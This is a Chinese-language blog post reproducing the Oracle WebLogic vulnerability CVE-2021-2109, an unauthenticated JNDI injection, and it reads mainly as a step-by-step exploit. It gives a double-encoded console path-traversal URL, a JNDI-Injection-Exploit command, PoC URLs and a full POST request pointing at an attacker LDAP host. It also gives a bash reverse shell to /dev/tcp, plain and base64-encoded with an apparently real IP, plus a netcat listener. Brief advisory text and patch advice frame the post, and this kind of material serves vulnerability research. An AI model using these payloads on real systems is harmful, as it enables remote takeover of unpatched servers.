- A+
所属分类:漏洞复现
0x01 简介
2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。
0x02 漏洞编号
1 |
CVE-2021-2109 |
0x03 影响版本
1 2 3 4 5 |
WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 |
0x04 漏洞复现
未授权访问地址:
1 |
http://ip:7001/console/css/%252e%252e%252f/consolejndi.portal |
1 |
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A vps -C "touch /tmp/shelli" |
poc
1 |
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/cqubba;AdminServer%22) |
1 2 3 4 5 6 7 8 9 10 11 12 |
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1 Host: ip:7001 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 |
命令执行成功
反弹shell
bash
1 |
/bin/bash -i >& /dev/tcp/vps/55555 0>&1 |
base64编码:http://www.jackson-t.ca/runtime-exec-payloads.html
1 |
bash -c {echo,L2Jpbi9iYXNoIC1pID4mICAvZGV2L3RjcC84MS43MC4xNDYuNTUvNTU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i} |
开启监听
1 |
nc -lnvp 9999 |
poc
1 |
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/3pgd15;AdminServer%22) |
0x05 工具附件
1 |
https://github.com/welk1n/JNDI-Injection-Exploit |
0x06 修复建议
更新最新补丁,参考Oracle官网发布的补丁:https://www.oracle.com/security-alerts/cpujan2021.html
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-